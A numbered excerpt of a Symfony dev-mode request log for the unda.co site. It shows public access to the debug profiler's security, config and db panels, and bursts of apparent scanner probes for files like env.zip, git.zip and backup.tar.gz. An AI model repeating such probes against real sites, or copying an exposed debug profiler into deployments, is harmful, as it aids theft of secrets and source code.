  3103. [2025-12-18 02:18:58] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"55fc44","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/55fc44?panel=twig","method":"GET"} []
  3104. [2025-12-18 02:18:58] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  3105. [2025-12-18 02:33:42] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0397c8","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0397c8?panel=security","method":"GET"} []
  3106. [2025-12-18 02:33:42] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  3107. [2025-12-18 02:35:59] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
  3108. [2025-12-18 02:37:57] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0f40a7","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0f40a7?panel=cache","method":"GET"} []
  3109. [2025-12-18 02:37:57] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  3110. [2025-12-18 02:41:33] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0397c8","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0397c8?panel=request","method":"GET"} []
  3111. [2025-12-18 02:41:33] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  3112. [2025-12-18 02:43:35] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  3113. [2025-12-18 02:43:56] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"POST"} []
  3114. [2025-12-18 02:44:10] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"POST"} []
  3115. [2025-12-18 02:44:24] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /WuEL"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /WuEL\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3116. [2025-12-18 02:44:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /a"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /a\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3117. [2025-12-18 02:45:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /download/file.ext"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /download/file.ext\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3118. [2025-12-18 02:48:02] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /SiteLoader"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /SiteLoader\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3119. [2025-12-18 02:56:42] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"2b8781","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/2b8781/search/results?ip=189.172.83.228&limit=10&method=GET","method":"GET"} []
  3120. [2025-12-18 02:56:43] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=189.172.83.228&limit=10&method=GET","method":"GET"} []
  3121. [2025-12-18 03:00:01] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"c98e4d","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/c98e4d?panel=db","method":"GET"} []
  3122. [2025-12-18 03:00:02] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
  3123. [2025-12-18 03:02:53] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /ReportServer"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /ReportServer\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3124. [2025-12-18 03:08:44] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"533e9e","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/533e9e?panel=config","method":"GET"} []
  3125. [2025-12-18 03:08:44] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  3126. [2025-12-18 03:10:31] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /env.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /env.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3127. [2025-12-18 03:10:31] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /app/app.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /app/app.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3128. [2025-12-18 03:10:31] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /home.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /home.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3129. [2025-12-18 03:10:31] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backend.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backend.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3130. [2025-12-18 03:10:31] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /git.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /git.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3131. [2025-12-18 03:10:31] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3132. [2025-12-18 03:10:31] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3133. [2025-12-18 03:10:31] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /app.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /app.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3134. [2025-12-18 03:10:31] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup.tar.gz"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup.tar.gz\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3135. [2025-12-18 03:13:51] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b37bf1","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/b37bf1?panel=db","method":"GET"} []
  3136. [2025-12-18 03:13:51] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
  3137. [2025-12-18 03:14:16] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
  3138. [2025-12-18 03:16:22] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://www.unda.co/","method":"GET"} []
  3139. [2025-12-18 03:19:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backend.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backend.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3140. [2025-12-18 03:19:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /app/app.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /app/app.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3141. [2025-12-18 03:19:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3142. [2025-12-18 03:19:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /env.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /env.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3143. [2025-12-18 03:19:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup.tar.gz"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup.tar.gz\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3144. [2025-12-18 03:19:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /home.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /home.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3145. [2025-12-18 03:19:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /app.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /app.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3146. [2025-12-18 03:19:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3147. [2025-12-18 03:19:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /git.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /git.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3148. [2025-12-18 03:23:17] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  3149. [2025-12-18 03:23:17] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
  3150. [2025-12-18 03:24:09] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
  3151. [2025-12-18 03:24:29] request.INFO: Matched route "_wdt". {"route":"_wdt","route_parameters":{"_controller":"web_profiler.controller.profiler:toolbarAction","token":"d7d5e3","_route":"_wdt"},"request_uri":"https://unda.co/_wdt/d7d5e3","method":"GET"} []
  3152. [2025-12-18 03:24:34] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
  3153. [2025-12-18 03:24:36] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
  3154. [2025-12-18 03:25:05] request.INFO: Matched route "_wdt". {"route":"_wdt","route_parameters":{"_controller":"web_profiler.controller.profiler:toolbarAction","token":"c59887","_route":"_wdt"},"request_uri":"https://unda.co/_wdt/c59887","method":"GET"} []
  3155. [2025-12-18 03:25:06] request.INFO: Matched route "_wdt". {"route":"_wdt","route_parameters":{"_controller":"web_profiler.controller.profiler:toolbarAction","token":"e4fc6d","_route":"_wdt"},"request_uri":"https://unda.co/_wdt/e4fc6d","method":"GET"} []
  3156. [2025-12-18 03:25:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /app.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /app.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3157. [2025-12-18 03:25:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup.tar.gz"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup.tar.gz\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3158. [2025-12-18 03:25:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backend.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backend.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3159. [2025-12-18 03:25:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3160. [2025-12-18 03:25:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /app/app.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /app/app.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3161. [2025-12-18 03:25:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3162. [2025-12-18 03:25:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /git.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /git.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3163. [2025-12-18 03:25:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /env.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /env.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3164. [2025-12-18 03:25:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /home.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /home.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
